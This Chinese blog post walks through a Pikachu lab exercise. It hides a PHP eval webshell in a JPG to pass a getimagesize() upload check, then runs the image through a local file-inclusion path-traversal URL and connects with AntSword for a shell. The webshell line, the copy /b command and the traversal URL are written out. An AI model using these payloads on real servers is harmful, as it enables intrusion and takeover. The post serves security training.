渗透测试-文件上传之getimagesize函数绕过

已于 2023-01-20 10:39:07 修改
阅读量3.6k 收藏 10
点赞数 1
分类专栏: 渗透测试 文章标签: 安全性测试 web安全 安全
于 2022-04-25 23:39:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/124416062
版权

文件上传之getimagesize函数绕过

文章目录

前言

一、什么是getimagesize函数

getimagegesize()函数用于获取图像代销及相关信息,成功返回一个数组,失败则返回一个错误信息,总之是一个判断图片大小和类型的一个函数,也避免了直接更改后缀名的绕过。

二、文件上传之getimagesize函数绕过

1. getimagesize函数绕过

我们先进行pikachu中的练习,打开代码审计看看
在这里插入图片描述
这里进行实验
在这里插入图片描述
只允许上传图片,而且我将后缀名.php改为.png,但是图片打不开。
我们将一句话木马php和png文件进行合并试一下,有两种方法可以试一下
第一种可以用cmd进行修改,执行命令
copy /b test.jpg+test.php ok.jpg
但是上传的时候报错了,可能文件大小不支持
在这里插入图片描述
所以我们这里进行工具,合成新图片上传
在这里插入图片描述
我们使用这个软件
只需将jpg图片放进去就会进行合成,只能输入jpg图片哦
在这里插入图片描述
输入一句话木马,点击ok,这时图片就插入一句话木马了

<?php @eval($_POST['chopper']); ?>

在这里插入图片描述
我们打开图片发现已经注入了,这时我们进行上传图片
在这里插入图片描述
图片上传成功
我们获得图片路径
uploads/2022/04/25/9173926266b8737e383119814519.jpg
下一步就进行打开获得shell的步骤了

2. 通过文件包含漏洞解析获得webshell

但是我们合成的只是jpg图片,在网站中是无法打开的
我们需要转换为php文件才可以打开,这里我们想到两种方法,一种是解析漏洞,另一种是文件包含漏洞
这里我们使用文件包含漏洞进行解析,来获取shell
首先我们找一个存在文件包含漏洞的平台
我们在pikachu中找一个实验,点击上传文件后,复制网址就行修改就可以了
在这里插入图片描述
http://192.168.222.4/pikachu/vul/fileinclude/fi_local.php?filename=file1.php&submit=%E6%8F%90%E4%BA%A4
我们只需要将file1.php修改为我们当前图片的路径就行了

找file1.php文件的位置,找当前的目录,往前推一直找到unsafeupload的目录
…/…/unsafeupload/uploads/2022/04/25/9173926266b8737e383119814519.jpg

这是我们file1.php文件的当前路径
D:\phpStudy\WWW\pikachu\vul\fileinclude\include\file1.php

回两级回到文件上传的位置
在这里插入图片描述
进行修改,结果为这个路径
http://192.168.222.4/pikachu/vul/fileinclude/fi_local.php?filename=…/…/unsafeupload/uploads/2022/04/25/9173926266b8737e383119814519.jpg&submit=%E6%8F%90%E4%BA%A4

我们将路径进行打开看一下,是否可以打开
在这里插入图片描述
发现打得开,文件修改成功。
这时文件是php文件,我们可以打开蚁剑进行连接获取shell,
输入网址和密码
在这里插入图片描述
成功获取shell,实验结束。

总结

本次实验是对文件上传漏洞绕过方法的补充,引入了getimagesize函数的绕过方法,结合了图片合成木马技术,文件包含漏洞的知识方法进行绕过,从而获取shell的过程。

炫彩@之星
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Pikachu靶场——文件上传漏洞_pikachu文件上传漏洞,2024年最新2024年腾讯网络安全高级面试题及答案
erthre的博客
04-15 551
filename=…我们在这里查看浏览按钮,可以看出这里有一个对应的判断,当input标签去onchange,发生改变的时候,他就回去调用checkFileExt,我们可以把checkFileExt函数删掉,这和我们之前XSS漏洞的时候修改限制字数一样。这个PHP文件上传成功后,就和前面的一样,我们可以通过访问这个PHP文件,传参,通过一句话木马来控制服务器。,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。
PHP实践:获取网络上图片的长宽以及图片类型
黑夜开发者的博客
08-24 2888
在开发Web应用程序中,我们经常需要从网络上获取图片并对其进行处理。有时候,我们可能需要知道图片的长宽和类型信息,以便进行进一步的操作或展示给用户。在PHP中,我们可以使用函数来获取网络图片的长宽和类型信息。是一个内置函数,用于获取图片的各种属性信息,包括宽度、高度、类型等。该函数可以对本地图片文件或通过URL访问的网络图片进行操作。在本文中,我们将重点介绍如何使用该函数获取网络图片的信息。
pikachu通关教程通关详解超详细
最新发布
Innocence_0的博客
04-12 836
RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。
php getimagesize函数,getimagesize 函数不是完全可靠的
weixin_36397372的博客
03-18 639
getimagesize 函数并不属于 GD 扩展的部分,标准安装的 PHP 都可以使用这个函数。可以先看看这个函数的文档描述:http://php.net/manual/zh/function.getimagesize.php如果指定的文件如果不是有效的图像,会返回 false,返回数据中也有表示文档类型的字段。如果不用来获取文件的大小而是使用它来判断上传文件是否是图片文件,看起来似乎是个很不错...
getimagesize()函数获取图片宽高取反
Aring的博客
04-21 820
背景: 手机摄像头朝下拍摄,上传后,getimagesize()获取图片信息会把宽高去反,面对这种情况有以下方法。 一、情况 exif_read_data() exif_read_data()函数是能获取图片详细摄像信息,包括GPS信息,所以以后图片上传前最好还是进行二次处理。 Array ( [0] => 2304 [1] => 1728 [2] => 2 [3] => width="2304" height="1728" [bits]
imagesize()函数获取图片信息
苦艾文艺
11-16 1万+
imagesize() imagesize()函数:用于获取图像大小及相关信息,成功返回一个数组,失败则返回 FALSE 并产生一条 E_WARNING 级的错误信息。 For example: $filename="20151126.jpg"; print_r(getimagesize($filename));output:Array ( [0] => 562 [1] =>
pikachu文件上传
qq_62078839的博客
04-03 2521
Client check 打开靶场尝试直接上传一句话木马发现无法上传 正在上传…重新上传取消 又看到此道题目题名为Client check,猜想是在前端对上传文件进行判断,我们直接禁止使用js,再尝试上传文件,发现上传成功 正在上传…重新上传取消 使用phpinfo()来确认木马的可用性 正在上传…重新上传取消 MIME type 正在上传…重新上传取消 这里我们看到标题是MIME type就可以想到通过更改文件content-type来成功上传小马 正在上传…重新上传取消 成功上
Pikachu靶场01-文件上传漏洞详解
AkangBoy的博客
12-02 2102
本文主要介绍离线靶场Pikachu中的文件上传漏洞的原理和绕过姿势
php中使用getimagesize获取图片、flash等文件的尺寸信息实例
10-26
`getimagesize()` 函数是PHP提供的一种强大工具,用于获取图像文件的宽度、高度、类型等信息。在本文中,我们将深入探讨 `getimagesize()` 的用法及其在处理不同文件类型时的细节。 首先,让我们了解 `getimagesize...
网络空间安全 +文件上传基础入门
11-09
- 不同版本的PHP可能存在不同的检测机制,例如php5使用`getimagesize()`函数,攻击者可能利用%00截断或特殊文件格式(如jp2)来绕过检测。 **五、后缀大小写绕过** - 攻击者可能通过上传文件时更改大小写(如.PHP...
php 文件上传代码(限制jpg文件)
10-29
在实际应用中,应该使用`exif_imagetype()`或`getimagesize()`来验证文件类型。 - 也没有进行任何防跨站脚本(XSS)或文件注入的防御措施。实际使用时,应确保文件名的合法性,避免使用可能包含恶意代码的文件名。 ...
php getimagesize 上传图片的长度和宽度检测代码
10-29
getimagesize — 取得图像大小
Pikachu靶场——文件上传漏洞(Unsafe upfileupload)
来日可期的博客
10-04 1824
文件上传Web应用必备功能之一,如头像上传,附件分享等。如果服务器配置不当或者没有进行足够的过滤,Web用户就可以上传任意文件,包括恶意脚本文件,exe程序等等,这就造成了任意文件上传漏洞。
pikachu练习(七)
a987329381的博客
06-03 316
这种情况我们称为"文件包含漏洞”现在的cookie是普通用户的登录态,我们将其复制下来,并在repeater中查找刚刚发过来的post请求,我们将这里的cookie改为我们刚刚复制的普通用户的cookie,这样一来,我们就是以普通用户态来发送请求。固定的图片文件,十六进制的头部的前面的几个字符串基本上是一样的,比如说png格式的图片,所有png格式的图片前面的十六进制都是一样的。可以看到,我们成功访问到了lili的个人信息 ,这便是平行越权,我们登录的是lucy的账号,却访问到了lili的个人信息。
文件上传漏洞(客户端绕过,MIMEtipe绕过,getimagesize绕过)
weixin_41472455的博客
05-26 1103
客户端绕过 文件上传的前端绕过主要验证手段为前端的 javascript 代码执行 js验证代码如下: -------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------..
0513 8-4 文件上传之getimagesize 绕过案例和防范措施
qq_42764906的博客
05-13 3664
视频中2张图片的16进制 头几个字符串都是一样的 8950 4e47 打开pikachu在Unsafe Fileupload 中的getimagesize中 上传图片发现正常 核心:getimagesize 这个函数是检查图片的前面16进制来检查是否为图片。如果说在在16进制后面加入恶意代码,就可以神不知鬼不觉的上传图片和本地文件包含漏洞(改URL的)结合 达到入侵的目的!即制作包含恶意代码的图片...
[PHP] GD库(三):获取图像信息 getimagesize 函数
林毅洋
07-27 4442
[PHP] GD库(三):获取图像信息 getimagesize 函数 getimagesize()函数用于获取图像尺寸,类型等信息。  imagesx()  函数用于获取图像的宽度。  imagesy()  函数用于获取图像的高度。 getimagesize() getimagesize() 函数用于获取图像大小及相关信息,成功返回一个数组,失败则返回 FALSE 并产生一条 E_WARNIN
PHP的函数获取图片的宽高等信息
ak47147258369的博客
06-17 116
PHP的函数getimagesize可以得到图片的宽高等信息 array getimagesize ( string $filename [, array &$imageinfo ] ) 返回一个具有四个单元的数组。索引 0 包含图像宽度的像素值,索引 1 包含图像高度的像素值。索引 2 是图像类型的标记:1 = GIF,2 = JPG,3 = PNG,4 ...
DVWA & File Upload文件上传最详细绕过
热门推荐
Hackpatrick的博客
08-04 2万+
DVWA的使用练习: 今天学习的内容很有意思,也很实用。 DVWA其实本质上就是一个脆弱系统,它需要的是php+mysql的环境,旨在为安全人员提供一个合法的环境用来测试自己的专业技能和工具,并且让web安全工作着深刻的理解漏洞防范和入侵的本质原理,很适合我们这种小白锻炼自己,好废话不多说。。。。。 首先DVWA环境安装: 在下载DVWA之前我们需要一个php+mysql的环境,apach...
html页面如何做一个文件上传
06-05
要在HTML页面中实现文件上传,需要使用HTML表单和服务器端脚本。以下是一个简单的示例: HTML代码: ``` <form action="upload.php" method="post" enctype="multipart/form-data"> <input type="file" name="fileToUpload" id="fileToUpload"> <input type="submit" value="上传文件" name="submit"> </form> ``` 解释: - `action` 属性指定表单数据提交到的服务器端脚本的URL。 - `method` 属性指定HTTP请求的方法。在文件上传中,必须使用POST方法。 - `enctype` 属性指定表单数据编码的类型。在文件上传中,必须使用 `multipart/form-data`。 在表单中包含一个 `input` 元素,类型为 `file`,它允许用户选择一个文件进行上传。文件选择后,表单提交时,文件将作为表单数据的一部分发送到服务器。文件数据可通过服务器端脚本进行处理。 服务器端脚本(示例中为PHP): ``` <?php $target_dir = "uploads/"; // 上传文件保存的目录 $target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]); // 上传文件的完整路径 $uploadOk = 1; $imageFileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION)); // 获取上传文件的扩展名 // 检查文件是否为真正的文件类型 if(isset($_POST["submit"])) { $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]); if($check !== false) { echo "文件是一个" . $check["mime"] . "类型的文件。"; $uploadOk = 1; } else { echo "文件不是一个图片文件。"; $uploadOk = 0; } } // 检查文件是否已经存在 if (file_exists($target_file)) { echo "文件已经存在。"; $uploadOk = 0; } // 检查文件大小 if ($_FILES["fileToUpload"]["size"] > 500000) { echo "文件太大。"; $uploadOk = 0; } // 允许上传的文件类型 if($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg" && $imageFileType != "gif" ) { echo "只允许上传 JPG, JPEG, PNG 和 GIF 文件。"; $uploadOk = 0; } // 检查上传过程中是否发生了错误 if ($uploadOk == 0) { echo "文件没有成功上传。"; // 如果一切正常,将文件从临时目录移动到目标目录 } else { if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) { echo "文件". basename( $_FILES["fileToUpload"]["name"]). "已经成功上传。"; } else { echo "上传过程中发生了错误。"; } } ?> ``` 解释: - `basename($_FILES["fileToUpload"]["name"])` 获取上传文件的文件名。 - `strtolower(pathinfo($target_file,PATHINFO_EXTENSION))` 获取上传文件的扩展名。 - `move_uploaded_file()` 函数将上传的文件从临时目录移动到目标目录。 - 代码中的其他部分用于验证上传文件的大小、类型和是否已经存在。 以上是一个简单的文件上传示例,可以根据自己的需求进行修改和扩展。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值